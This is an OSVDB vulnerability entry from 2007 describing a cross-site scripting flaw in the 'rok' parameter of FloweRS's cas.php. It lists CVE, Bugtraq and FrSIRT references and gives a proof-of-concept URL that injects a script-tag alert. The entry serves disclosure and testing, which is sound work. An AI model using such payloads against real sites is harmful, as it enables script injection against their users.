FloweRS cas.php rok Variable XSS

2007-04-14T15:53:54
ID OSVDB:35354
Type osvdb
Reporter OSVDB
Modified 2007-04-14T15:53:54

Description

Manual Testing Notes

http://[target]/[path]/cas.php?rok=<script>alert(/the_Edit0r/);</script>

References:

Vendor URL: http://sourceforge.net/projects/flowers/
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0220.html
FrSIRT Advisory: ADV-2007-1402
CVE-2007-2308
Bugtraq ID: 23488